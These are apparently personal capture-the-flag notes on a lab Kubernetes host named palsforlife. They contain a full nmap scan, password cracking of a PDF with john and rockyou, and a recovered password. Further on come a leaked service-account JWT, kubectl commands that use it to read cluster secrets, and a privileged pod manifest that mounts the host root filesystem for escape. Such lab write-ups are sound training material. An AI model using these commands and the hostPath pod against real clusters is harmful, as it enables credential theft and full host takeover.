[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-12 13:43 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:43
Completed NSE at 13:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:43
Completed NSE at 13:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:43
Completed NSE at 13:43, 0.00s elapsed
Initiating Ping Scan at 13:43
Scanning 10.10.139.174 [2 ports]
Completed Ping Scan at 13:43, 0.32s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:43
Completed Parallel DNS resolution of 1 host. at 13:43, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 13:43
Scanning 10.10.139.174 [6 ports]
Discovered open port 30180/tcp on 10.10.139.174
Discovered open port 22/tcp on 10.10.139.174
Discovered open port 10250/tcp on 10.10.139.174
Discovered open port 6443/tcp on 10.10.139.174
Discovered open port 31112/tcp on 10.10.139.174
Discovered open port 31111/tcp on 10.10.139.174
Completed Connect Scan at 13:43, 0.34s elapsed (6 total ports)
Initiating Service scan at 13:43
Scanning 6 services on 10.10.139.174
Stats: 0:01:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 83.33% done; ETC: 13:45 (0:00:19 remaining)
Completed Service scan at 13:46, 141.67s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.139.174.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:46
Completed NSE at 13:46, 12.77s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:46
Completed NSE at 13:46, 3.29s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:46
Completed NSE at 13:46, 0.00s elapsed
Nmap scan report for 10.10.139.174
Host is up, received conn-refused (0.33s latency).
Scanned at 2024-03-12 13:43:48 CST for 159s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c9:f7:dd:3d:79:bb:f8:44:0f:bd:87:bd:8b:af:e1:5a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHvPJdllGsYwbwbvXMP0T/d6NcClFy34rSyAVlCPB5jeR0/7DffGcCbj/+kwkTKw82Eb6HtTLKvQwFQduzGqba74IUgxJ3NmQ4IrnbwYg0Mqf1z0ZWeD3rMQKOJeDKcApnW24P2zjBjZ8iNf449DzQLQoQyhti0MQavrLYMwcELCd3u+83FD0pZZN4q5d5yor9EV++lZ5fpU0+seEWoXY9c0LfA9CX+6jwv2cQFTwqC8R78kkTimczT8tVVds/z0KUwpL7t2lsVMxIJ1SKi7XiroU0zJ+YkttZoio7++1vGtW+27Kv/PGQPI7v+953TPZ06BPC3/nxU7CD9Gtpig/h
| 256 4c:48:9d:c6:b4:e2:17:99:76:48:20:fe:96:d2:c8:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBKRe1KeqoY2DzrMJa+jbQPKLy+IMjqWDOtBQy+Oohg2R+bm1H1VcJWSTE2HhxW7GsbzBEAtqW+290KhTOOmiSQ=
| 256 d8:e2:f7:ac:4d:cd:68:66:d7:a9:64:1c:42:4a:8e:30 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKiIJ3rd6/JIuiXUx0sJhq8nY1ZypBueO4uckLvIzpur
6443/tcp open ssl/sun-sr-https? syn-ack
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 401 Unauthorized
| Cache-Control: no-cache, private
| Content-Type: application/json
| Date: Tue, 12 Mar 2024 05:44:53 GMT
| Content-Length: 129
| {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 401 Unauthorized
| Cache-Control: no-cache, private
| Content-Type: application/json
| Date: Tue, 12 Mar 2024 05:44:04 GMT
| Content-Length: 129
| {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
| HTTPOptions:
| HTTP/1.0 401 Unauthorized
| Cache-Control: no-cache, private
| Content-Type: application/json
| Date: Tue, 12 Mar 2024 05:44:05 GMT
| Content-Length: 129
|_ {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
| ssl-cert: Subject: commonName=k3s/organizationName=k3s
| Subject Alternative Name: DNS:kubernetes, DNS:kubernetes.default, DNS:kubernetes.default.svc.cluster.local, DNS:localhost, IP Address:10.10.139.174, IP Address:10.43.0.1, IP Address:127.0.0.1, IP Address:172.30.18.136, IP Address:192.168.1.244
| Issuer: commonName=k3s-server-ca@1622498168
| Public Key type: ec
| Public Key bits: 256
| Signature Algorithm: ecdsa-with-SHA256
| Not valid before: 2021-05-31T21:56:08
| Not valid after: 2025-03-12T05:35:48
| MD5: 7817:2149:0ed9:4704:4e9c:3611:556c:7040
| SHA-1: 4ea8:4b79:7087:c385:6398:cd7c:f427:28f9:7010:742a
| -----BEGIN CERTIFICATE-----
| MIIB+DCCAZ+gAwIBAgIII6msOEg4WjQwCgYIKoZIzj0EAwIwIzEhMB8GA1UEAwwY
| azNzLXNlcnZlci1jYUAxNjIyNDk4MTY4MB4XDTIxMDUzMTIxNTYwOFoXDTI1MDMx
| MjA1MzU0OFowHDEMMAoGA1UEChMDazNzMQwwCgYDVQQDEwNrM3MwWTATBgcqhkjO
| PQIBBggqhkjOPQMBBwNCAAQBAUGk5Ox0oLT3rZzPJUCVmQiwoHcg1zdU61yDtWZh
| 3Xv9/5BRkm/Hub4A1/z45qmNzYAdjAqi11p6s6lZhzfmo4HDMIHAMA4GA1UdDwEB
| /wQEAwIFoDATBgNVHSUEDDAKBggrBgEFBQcDATAfBgNVHSMEGDAWgBTmY3iEZ5WD
| XNcMriUDriCamzSP1zB4BgNVHREEcTBvggprdWJlcm5ldGVzghJrdWJlcm5ldGVz
| LmRlZmF1bHSCJGt1YmVybmV0ZXMuZGVmYXVsdC5zdmMuY2x1c3Rlci5sb2NhbIIJ
| bG9jYWxob3N0hwQKCouuhwQKKwABhwR/AAABhwSsHhKIhwTAqAH0MAoGCCqGSM49
| BAMCA0cAMEQCID9YoyZGJljp+d7c/IQqzrdnIiO/agFu7FOL9X0W444FAiAiWPFr
| GWzESPyA9kkdFaIdDPMaRHy9DJpDpYOMs35zPQ==
|_-----END CERTIFICATE-----
10250/tcp open ssl/http syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| ssl-cert: Subject: commonName=palsforlife
| Subject Alternative Name: DNS:palsforlife, DNS:localhost, IP Address:127.0.0.1, IP Address:10.10.139.174
| Issuer: commonName=k3s-server-ca@1622498168
| Public Key type: ec
| Public Key bits: 256
| Signature Algorithm: ecdsa-with-SHA256
| Not valid before: 2021-05-31T21:56:08
| Not valid after: 2025-03-12T05:35:46
| MD5: 77e1:6b48:a8fe:324d:823f:fb9f:19ac:37aa
| SHA-1: 052a:3cbb:aff3:8913:e3c9:3386:de21:4e61:d067:4f0a
| -----BEGIN CERTIFICATE-----
| MIIBpTCCAUygAwIBAgIIR31mK/uQBL0wCgYIKoZIzj0EAwIwIzEhMB8GA1UEAwwY
| azNzLXNlcnZlci1jYUAxNjIyNDk4MTY4MB4XDTIxMDUzMTIxNTYwOFoXDTI1MDMx
| MjA1MzU0NlowFjEUMBIGA1UEAxMLcGFsc2ZvcmxpZmUwWTATBgcqhkjOPQIBBggq
| hkjOPQMBBwNCAAQ3WT5sy0DB2LeKatk1dcRAuf7KwhCTIxwWTR5YwpyK+1oUEe4L
| 0hKr17Tzp30JWGZ48Xm/UUQdNfdt3iX+mzd1o3cwdTAOBgNVHQ8BAf8EBAMCBaAw
| EwYDVR0lBAwwCgYIKwYBBQUHAwEwHwYDVR0jBBgwFoAU5mN4hGeVg1zXDK4lA64g
| mps0j9cwLQYDVR0RBCYwJIILcGFsc2ZvcmxpZmWCCWxvY2FsaG9zdIcEfwAAAYcE
| CgqLrjAKBggqhkjOPQQDAgNHADBEAiBFvFoW9y421owN1Cj719wJ3ekUprzIL0qk
| Jl/z4drK3wIgT3ptIRY69XMQYSfuiTXl9RGQQNeYPRmUgM7hgYcoAew=
|_-----END CERTIFICATE-----
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
30180/tcp open http syn-ack nginx 1.21.0
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.21.0
|_http-title: 403 Forbidden
31111/tcp open unknown syn-ack
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=62ac226244bc8a79; Path=/; HttpOnly
| Set-Cookie: _csrf=q_audmTbd9nB1rxeN5hbWpyTK_I6MTcxMDIyMjIzNjgzNTI4NDQ4Nw%3D%3D; Path=/; Expires=Wed, 13 Mar 2024 05:43:56 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 12 Mar 2024 05:43:56 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Gitea: Git with a cup of tea</title>
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
| <meta name="description" content="Gitea (Git with a cup of tea) is a painless self-hosted Git service written in Go" />
| <meta name="keywords" content="go,git,self-hosted,gitea
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=b7bd7c9779d1e2d8; Path=/; HttpOnly
| Set-Cookie: _csrf=KEPh58EUaBdIID3GvN8uKEyn0s86MTcxMDIyMjIzNzUzODM4NjU1NQ%3D%3D; Path=/; Expires=Wed, 13 Mar 2024 05:43:57 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 12 Mar 2024 05:43:57 GMT
| <!DOCTYPE html>
| <html>
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Page Not Found - Gitea: Git with a cup of tea</title>
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
| <meta name="description" content="Gitea (Git with a cup of tea) is a painless self-hosted Git service written in Go" />
|_ <meta name="keywords" content="
31112/tcp open ssh syn-ack OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 2b:c6:63:84:93:b8:04:ce:1c:f5:ce:c7:0e:ca:eb:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL89blW/fideD2Xo7UKOytdLmzkVLToqJFWPKHQ4UP9ZNXTr7GAqeXvRRB9wmdsv4CpNRnQh3KtHuB7QgfZA//6aHtf5ss8zQydhZW5HS6a3Y2DhRnmOLtDQK5XHA1icP2EMYKIH0rfgPFFm1SRUieqbn62Zu//Cd8TdTfax7u1X3raA1nA7WEa+bnH1U4zO7sC6pZVSh7OoDRR/uD8r1xy2IxwcEIHyLVYdJdjxNhy8ryzkU1fwwLbzhSOsA+9bN/V4pq5/tLvipsX5FpIeF7CwHd+3EWlHl64zTWuCnvr5u/MBN3Q/bM2UGbwxj8Jq8tFRbQXoSfXpTrodKmLBSB
| 256 93:6b:41:5f:89:14:97:0c:6b:53:ab:ba:af:71:f1:40 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWQuDYkhFhWAillXUpZDXIg86x6wt2RLODmfT6jSjAW8VQO+B6efJrMV5Z5YkJ57WmqTF2rPDxEBIegPiMHddU=
| 256 e8:c4:94:7b:72:d7:4c:1c:bd:51:4a:84:81:4b:68:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILJgWYJQirOpfa5TYPCcHU+p2NbHFMTjHFyTyGU9KVng
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port6443-TCP:V=7.94SVN%T=SSL%I=7%D=3/12%Time=65EFEBA3%P=aarch64-unknown
SF:-linux-gnu%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon
SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\
SF:r\n400\x20Bad\x20Request")%r(GetRequest,11A,"HTTP/1\.0\x20401\x20Unauth
SF:orized\r\nCache-Control:\x20no-cache,\x20private\r\nContent-Type:\x20ap
SF:plication/json\r\nDate:\x20Tue,\x2012\x20Mar\x202024\x2005:44:04\x20GMT
SF:\r\nContent-Length:\x20129\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\
SF:"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"Unauthorized
SF:\",\"reason\":\"Unauthorized\",\"code\":401}\n")%r(HTTPOptions,11A,"HTT
SF:P/1\.0\x20401\x20Unauthorized\r\nCache-Control:\x20no-cache,\x20private
SF:\r\nContent-Type:\x20application/json\r\nDate:\x20Tue,\x2012\x20Mar\x20
SF:2024\x2005:44:05\x20GMT\r\nContent-Length:\x20129\r\n\r\n{\"kind\":\"St
SF:atus\",\"apiVersion\":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"m
SF:essage\":\"Unauthorized\",\"reason\":\"Unauthorized\",\"code\":401}\n")
SF:%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\
SF:x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20B
SF:ad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConten
SF:t-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n
SF:400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20
SF:Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:
SF:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTT
SF:P/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20char
SF:set=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSS
SF:essionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent
SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4
SF:00\x20Bad\x20Request")%r(FourOhFourRequest,11A,"HTTP/1\.0\x20401\x20Una
SF:uthorized\r\nCache-Control:\x20no-cache,\x20private\r\nContent-Type:\x2
SF:0application/json\r\nDate:\x20Tue,\x2012\x20Mar\x202024\x2005:44:53\x20
SF:GMT\r\nContent-Length:\x20129\r\n\r\n{\"kind\":\"Status\",\"apiVersion\
SF:":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"Unauthori
SF:zed\",\"reason\":\"Unauthorized\",\"code\":401}\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port31111-TCP:V=7.94SVN%I=7%D=3/12%Time=65EFEB9C%P=aarch64-unknown-linu
SF:x-gnu%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-
SF:Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n40
SF:0\x20Bad\x20Request")%r(GetRequest,2699,"HTTP/1\.0\x20200\x20OK\r\nCont
SF:ent-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\
SF:x20Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=62ac226
SF:244bc8a79;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=q_audmTbd9nB1
SF:rxeN5hbWpyTK_I6MTcxMDIyMjIzNjgzNTI4NDQ4Nw%3D%3D;\x20Path=/;\x20Expires=
SF:Wed,\x2013\x20Mar\x202024\x2005:43:56\x20GMT;\x20HttpOnly\r\nX-Frame-Op
SF:tions:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2012\x20Mar\x202024\x2005:43:56\
SF:x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head\x20data-suburl=\"\">\n\
SF:t<meta\x20charset=\"utf-8\">\n\t<meta\x20name=\"viewport\"\x20content=\
SF:"width=device-width,\x20initial-scale=1\">\n\t<meta\x20http-equiv=\"x-u
SF:a-compatible\"\x20content=\"ie=edge\">\n\t<title>Gitea:\x20Git\x20with\
SF:x20a\x20cup\x20of\x20tea</title>\n\t<meta\x20name=\"theme-color\"\x20co
SF:ntent=\"#6cc644\">\n\t<meta\x20name=\"author\"\x20content=\"Gitea\x20-\
SF:x20Git\x20with\x20a\x20cup\x20of\x20tea\"\x20/>\n\t<meta\x20name=\"desc
SF:ription\"\x20content=\"Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\
SF:)\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\x20written\x2
SF:0in\x20Go\"\x20/>\n\t<meta\x20name=\"keywords\"\x20content=\"go,git,sel
SF:f-hosted,gitea")%r(HTTPOptions,1E87,"HTTP/1\.0\x20404\x20Not\x20Found\r
SF:\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=e
SF:n-US;\x20Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=b
SF:7bd7c9779d1e2d8;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=KEPh58E
SF:UaBdIID3GvN8uKEyn0s86MTcxMDIyMjIzNzUzODM4NjU1NQ%3D%3D;\x20Path=/;\x20Ex
SF:pires=Wed,\x2013\x20Mar\x202024\x2005:43:57\x20GMT;\x20HttpOnly\r\nX-Fr
SF:ame-Options:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2012\x20Mar\x202024\x2005:
SF:43:57\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head\x20data-suburl=\"
SF:\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20name=\"viewport\"\x20con
SF:tent=\"width=device-width,\x20initial-scale=1\">\n\t<meta\x20http-equiv
SF:=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\t<title>Page\x20Not\x20F
SF:ound\x20-\x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea</title>\n\t
SF:<meta\x20name=\"theme-color\"\x20content=\"#6cc644\">\n\t<meta\x20name=
SF:\"author\"\x20content=\"Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20
SF:tea\"\x20/>\n\t<meta\x20name=\"description\"\x20content=\"Gitea\x20\(Gi
SF:t\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x20painless\x20self-hos
SF:ted\x20Git\x20service\x20written\x20in\x20Go\"\x20/>\n\t<meta\x20name=\
SF:"keywords\"\x20content=\"");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:46
Completed NSE at 13:46, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:46
Completed NSE at 13:46, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:46
Completed NSE at 13:46, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 158.58 seconds

leeroy

用户

爆破nginx目录,拿到PDF
要密码

pdf2john a.pdf > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

爆破得到chickenlegs
密码是I_am_geniu5_P4ladin#‌
手输入一编就对了 草

还是找token

eyJhbGciOiJSUzI1NiIsImtpZCI6IkNtT1RDZkpCdzVWVjR2eVE2OVl3TGlya0tVZ21oY1NrTVBuUnUwb0JUU2sifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZmF1bHQtdG9rZW4tcXM2aHAiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjhlYjIwMTIwLTQ1M2MtNDI3YS05ZDZiLTQyZmZlNDY3MGMzZCIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.mzW7wWtI8ch5EDMQEhCD3jY4g56CzhO1RPyHUx5bYF7ZJVKH_qdniY0watK8GoQXNeGJKp7vk2B68efG4UaWWMCiJR6vX_d7L3HxDSbHebbD2WL17AhDFXE8QDkuZ2mO_dLnKm_DBrMA2_63v5JQfXJnU-rjSD4Xq39_LVI106frHLqVkX-roHzY4fHGjYe8ys9pwuy7Wk3QCRrYfnyuuVpglKCPfaLLnUdgbVg-x7zGrK_4MB780V7TNdZ0pH0dpfTxyS7L5KeW8uKVsG0hsfBXABv-Q_BsGuvvotpdPzrsAWkBspRRsoOPq28Cfl6uOZBAx_djkHFv3vza54WS9w

./kubectl --server=https://10.10.139.174:6443 --token="$(cat /tmp/sec)" auth can-i --list --insecure-skip-tls-verify

https很重要

./kubectl --server=https://10.10.139.174:6443 --token="$(cat /tmp/sec)" auth can-i --list --insecure-skip-tls-verify

./kubectl --server=https://10.10.139.174:6443 --token="$(cat /tmp/sec)" --insecure-skip-tls-verify get secret --all-namespaces

./kubectl --server=https://10.10.139.174:6443 --token="$(cat /tmp/sec)" --insecure-skip-tls-verify get secret flag3 -n kube-system -o json

./kubectl --server=https://10.10.139.174:6443 --token="$(cat /tmp/sec)" --insecure-skip-tls-verify create -f /tmp/a.yaml

./kubectl --server=https://10.10.139.174:6443 --token="$(cat /tmp/sec)" --insecure-skip-tls-verify exec -it pod -- '/bin/bash'
apiVersion: v1
kind: Pod
metadata:
name: pod
labels:
app: pod
spec:
containers:
- name: pod
image: gitea/gitea:1.5.1
imagePullPolicy: IfNotPresent
volumeMounts:
- name: hostvolume
mountPath: /pod
ports:
- containerPort: 80
securityContext:
privileged: true
volumes:
- name: hostvolume
hostPath:
path: /